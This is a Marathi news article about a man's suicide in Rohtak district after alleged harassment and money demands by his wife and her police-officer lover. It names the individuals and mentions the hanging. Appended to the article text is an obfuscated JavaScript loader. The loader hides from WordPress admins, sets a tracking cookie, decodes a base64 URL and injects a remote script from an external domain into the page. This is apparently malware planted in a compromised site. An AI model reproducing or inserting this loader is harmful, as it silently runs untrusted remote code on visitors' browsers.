ROHTAK DISTRICT NEWS: पत्नीने पोलिस प्रियकरासोबत अश्लील व्हिडिओ पाठवल्यावर पतीची आत्महत्या

1358 0

ROHTAK DISTRICT NEWS: हरियाणाच्या रोहतकमधून एक हादरवणारी घटना समोर आली आहे. रोहतकमध्ये एका पतीने पत्नी आणि तिच्या प्रियकराच्या छळाला कंटाळून आत्महत्या केली. आत्महत्या करण्यापूर्वी मृत पतीने एक व्हिडिओ बनवला होता ज्यामध्ये त्याने पत्नी आणि तिचा प्रियकर मानसिक त्रास देत असल्याची तक्रार केली होती. (ROHTAK DISTRICT NEWS)

camistrella passportPCMC MISSING GIRL VAISHNAVI INGAVALE: अंडरवॉटर कॅमेऱ्यामुळे सापडला विहिरीत अडकलेला तरुणीचा मृतदेह

रोहतक जिल्ह्यातील दोभ गावातील मगन उर्फ अजय या तरुणाने पत्नी दिव्या आणि तिच्या पोलीस प्रियकर दीपक यांच्यामुळे आत्महत्या केली. आत्महत्येपूर्वी मगनने एक व्हिडिओ बनवला होता… त्या व्हिडिओमध्ये त्याने दिव्या आणि दीपकने मिळून त्याच्यावर मानसिक आणि आर्थिक दबाव टाकल्याचं सांगितलंय.दिव्या आणि तिचा प्रियकर दीपक – जो की महाराष्ट्र पोलिसात अधिकारी आहे – यांचा एक अश्लील डान्सचा व्हिडिओ सोशल मीडियावर व्हायरल झाला आहे. तोच व्हिडिओ दिव्याने पती मगनला पाठवला होता.या व्हिडिओमध्ये दिव्या तिच्या प्रियकर दीपकसोबत नाचताना आणि अश्लील कृत्य करताना दिसतेय, तर दीपक तिचा व्हिडिओ शूट करताना दिसतो. हा व्हिडिओ पाहिल्यानंतर मगनने १८ जून रोजी झाडाला गळफास घेवून आत्महत्या केली.

*TOP NEWS MARATHI : ‘महिला पोलिसही सुरक्षित नसतील तर सामान्य महिलांचं काय ?’
पुण्यातील महिला कार्यकर्त्यांचं कोंढरेंच्या फोटोला जोडे मारो आंदोलन

मृत्यूपूर्वी मगनने बनवलेल्या व्हिडिओमध्ये सांगितलं की, दिव्या आणि दीपक दोघे मिळून त्याच्यावर जमीन विकण्यासाठी, वडिलांना मारण्यासाठी दबाव आणत होते. दीपकला नोकरीत बढतीसाठी ५ लाख रुपये लागणार होते आणि म्हणून मगनवर पैसे मागण्याचा तगादा होता.मगनने त्याच्या शेतीतून मिळालेल्या गव्हातून १.५ लाख आणि सोनं गहाण ठेवून अजून २ लाख रुपये दिले होते. तरीसुद्धा पैशांसाठी त्रास सुरूच होता.
मगनने सांगितलं की, लग्नानंतर कळालं की दिव्या आधीच विवाहित होती आणि तिचं एक मूल आहे. घटस्फोट न घेता तिने मगनशी लग्न केलं. मगनने वकिलाचा सल्ला घेतला होता पण प्रेमापोटी तक्रार केली नाही. उलट तिच्या घटस्फोटासाठी पैसे दिले.१८ जूनला मगनचा मृतदेह झाडाला लटकलेल्या अवस्थेत सापडला. आत्महत्येपूर्वी त्याने सोशल मीडियावर आपला शेवटचा व्हिडिओ पोस्ट केला होता. तो व्हिडिओ पाहून कुटुंबियांनी शोध घेतला आणि मग ही वेदनादायक घटना उघड झाली.कुटुंबियांनी आता आरोपी पत्नी दिव्या आणि तिचा पोलीस प्रियकर दीपक यांच्यावर कठोर कारवाईची मागणी केली आहे.(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9+/=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();